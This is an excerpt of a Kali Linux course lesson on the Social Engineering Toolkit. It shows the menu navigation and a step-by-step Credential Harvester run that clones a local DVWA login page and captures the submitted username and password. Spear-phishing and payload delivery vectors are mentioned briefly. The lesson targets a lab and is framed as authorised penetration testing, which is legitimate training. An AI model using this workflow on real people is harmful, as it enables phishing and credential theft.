π° Originally published on Securityelites β AI Red Team Education β the canonical, fully-updated version of this article.
π‘οΈ KALI LINUX COURSE
FREE
Part of the 180-Day Kali Linux Mastery Course
Day 26 of 180 Β· 14.4% complete
β οΈ Authorised Engagements Only. SET automates attacks that look convincingly real. Every exercise targets your own lab environment. Phishing real targets without written authorisation is illegal.
β Before You Start
- Day 25 β BeEF-XSS β browser hooking via XSS. SET takes the same attack surface into the human layer: instead of hooking a browser through a vulnerability, we deliver the payload through a convincing phishing email or cloned site.
- Kali Linux running Β· Python3 + SET installed (pre-installed in Kali) Β· DVWA or your own test webserver for cloning
Every pentest report I write includes a social engineering finding. Not because clients ask for it β they usually donβt β but because the technical controls theyβve spent hundreds of thousands on are bypassed the moment someone clicks a convincing email. SET (Social Engineering Toolkit) is the tool that demonstrates that gap in an authorised, reproducible way. Today I show you the full SET workflow: credential harvester, spear-phishing email vector, and the payload delivery chain that turns a convincing login page into an exploitation path.
π― What Youβll Master in Day 26
Launch SET and navigate the Social Engineering Attacks menu
Run the Credential Harvester to clone a login page and capture credentials
Craft and send a spear-phishing email with a payload link
Understand SETβs payload delivery options and when each applies
Write a social engineering finding for a pentest report
β±οΈ 40 min read Β· 3 exercises Β· Day 26 of 180 ### π Day 26 β SET Social Engineering Toolkit 1. SET Overview β Architecture and Attack Vectors 2. Credential Harvester β Clone and Capture 3. Spear-Phishing Email Attack Vector 4. Payload Delivery β Executable and HTA Files 5. Reporting Social Engineering Findings SET sits at the intersection of ethical hacking methodology and web security β it automates the human-layer attacks that OWASP describes theoretically. The Phishing URL Scanner is the blue team tool that defends against exactly what SET creates. Understanding both sides is the approach I take in every engagement. The full tool reference is in the Kali Linux Commands reference.
SET Overview β Architecture and Attack Vectors
SET (Social Engineering Toolkit) is a Python-based framework created by TrustedSec. It automates the construction and delivery of social engineering attacks for authorised penetration testing. My most-used attack vectors are the Credential Harvester (clones a legitimate login page and captures submitted credentials) and the Spear-Phishing Email Vector (delivers a payload via crafted email). Both demonstrate the human attack surface to clients who believe technical controls alone are sufficient.
LAUNCHING SET AND NAVIGATING THE MENUCopy
Launch SET (requires root)
sudo setoolkit
Main menu:
1) Social-Engineering Attacks β primary menu
2) Penetration Testing (Fast-Track)
3) Third Party Modules
Social Engineering Attacks sub-menu
1) Spear-Phishing Attack Vectors β email payload delivery
2) Website Attack Vectors β credential harvester, tabnabbing
3) Infectious Media Generator β USB autorun payloads
4) Create a Payload and Listener β MSF payload generation
5) Mass Mailer Attack β bulk phishing campaign
Website Attack Vectors sub-menu (most used)
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method β TODAY
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
Credential Harvester β Clone and Capture
The Credential Harvester clones a target websiteβs login page, hosts it on my Kali machine, and captures any credentials submitted through the fake page β forwarding the victim to the real site afterwards so they donβt notice. The clone is pixel-perfect because SET scrapes the real HTML. The victim sees their normal login page, submits credentials, gets redirected to the real site, and never realises their password was captured.
CREDENTIAL HARVESTER β STEP BY STEPCopy
Navigation path in SET
Main Menu β 1 (Social Engineering) β 2 (Website Attacks) β 3 (Credential Harvester)
SET asks: Site Cloner or Custom Import?
1) Web Templates β pre-built templates (Gmail, Facebook, etc.)
2) Site Cloner β clone ANY URL (most useful in assessments)
3) Custom Import β supply your own HTML
Site Cloner workflow
IP address for the POST back: [YOUR KALI IP]
Enter the URL to clone: http://localhost/dvwa/login.php
SET clones the page, starts web server on port 80
Output: [*] Cloning the website: http://localhost/dvwa/login.php
[*] This could take a little bitβ¦
[*] Harvester is ready, start sending mails
Victim visits: http://YOUR_KALI_IP/
They see cloned DVWA login, submit credentials
SET output shows:
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password
securityelites.com
SET Credential Harvester β Credential Capture Output
[] Harvester is ready, start sending mails
[] SET Web Server is listening on port: 80
β¦victim visits cloned page and submits credentialsβ¦
[] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: username=admin
POSSIBLE PASSWORD FIELD FOUND: password=password
[] WHEN YOUβRE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Captured credentials saved to: /root/.set/reports/
πΈ SET Credential Harvester output showing captured credentials. The β[*] WE GOT A HIT!β line appears the moment a victim submits the cloned login form. SET captures the raw POST data β username, password, and any other form fields. The victim is simultaneously redirected to the real DVWA login page, so from their perspective the login simply βfailed once and then worked.β In a real engagement, this output appears in my terminal while Iβm watching the phishing campaign β each credential submission is logged with timestamp and full field values.
π Read the complete guide on Securityelites β AI Red Team Education
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on Securityelites β AI Red Team Education β
This article was originally written and published by the Securityelites β AI Red Team Education team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit Securityelites β AI Red Team Education.
Top comments (0)